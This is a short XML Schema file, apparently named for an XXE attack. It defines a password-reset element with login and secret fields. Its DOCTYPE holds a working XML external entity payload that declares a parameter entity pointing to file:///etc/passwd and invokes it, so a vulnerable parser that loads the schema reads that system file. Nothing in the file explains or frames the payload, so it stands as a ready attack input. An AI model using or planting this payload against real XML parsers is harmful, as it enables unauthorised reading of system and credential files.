xxe.xsd

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE schema [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  %file;
]>
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
  
  <!-- Define the root element <reset> -->
  <xs:element name="reset">
    <xs:complexType>
      <xs:sequence>
        <xs:element name="login" type="xs:string"/>
        <xs:element name="secret" type="xs:string"/>
      </xs:sequence>
    </xs:complexType>
  </xs:element>
  
</xs:schema>
